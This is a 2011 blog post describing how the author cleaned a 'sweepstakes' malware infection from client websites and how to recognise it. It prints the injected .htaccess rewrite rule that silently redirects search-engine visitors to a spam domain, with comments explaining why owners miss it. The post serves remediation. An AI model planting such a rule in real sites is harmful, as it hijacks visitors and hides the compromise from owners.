Fixing Sweepstakes Malware Virus

Posted on: November 23rd, 2011

This week, a client of mine ran into an issue in which their sites were flagged with "Site contains malware" warnings. Whenever a visitor arrived at one of these sites from a search engine, they were redirected to a different URL instead of the page they had clicked on.

After spending some time cleaning this up, I wrote the following documentation. There are already several posts on this out there, but the more posts there are, the easier it will be for someone to fix it.

Keep in mind that the sites I was fixing were not WordPress.

My Documentation of the Malware

For the record, here is what I did: I went through our main directories looking for anything that had been modified recently.

Most of the infected files were modified on 11/10/11. The infection consists of a modified .htaccess file and, usually, two .php files dropped into the 'images' directory, typically named firstname_lastname.php or firstname_firstname.php.

In the .htaccess file, a rewrite block has been inserted that redirects any visitor who arrives from Google, Bing or another major search engine (it matches on the HTTP Referer header, so people who type the address directly never see it, which is why the site owner often does not notice). The code is below:

<IfModule mod_rewrite.c>
RewriteEngine On
# Inherit any rewrite rules from the parent directory so the injected rule
# does not break the site's own configuration and draw attention.
RewriteOptions inherit
# Fire only when the Referer header mentions a major search engine
# (case-insensitive); direct visits and the site owner are left alone.
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
# Redirect every request (.*) off-site; R = external redirect, L = last rule.
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

The same redirect URL also appears in the site's HTML, inside injected JavaScript; removing that script along with the .htaccess rule clears the issue.

I have backed up all .htaccess files in case there are complications after removing the file from the directory.

The dates on the .php files were 11/07/11 and 8/23/11. I'm not sure whether those dates are significant, but that is when they were placed in the directories.

The dropped .php files are always the same size, 28,278 KB, which makes them easy to pick out.

Sites that were set up after 8/23/11 had only the 11/07/11 .php file.

Closing Thoughts

If something like this happens to you, it's okay to freak out. After you have finished freaking out, take a deep breath, step back from the problem and fix it. It may take some looking around in the directories, but that is better than having your site listed as malware.

Below are some links to other posts related to this malware:
Sucuri Research Blog – .htaccess Redirect
Sucuri Research Blog – Javascript Injection

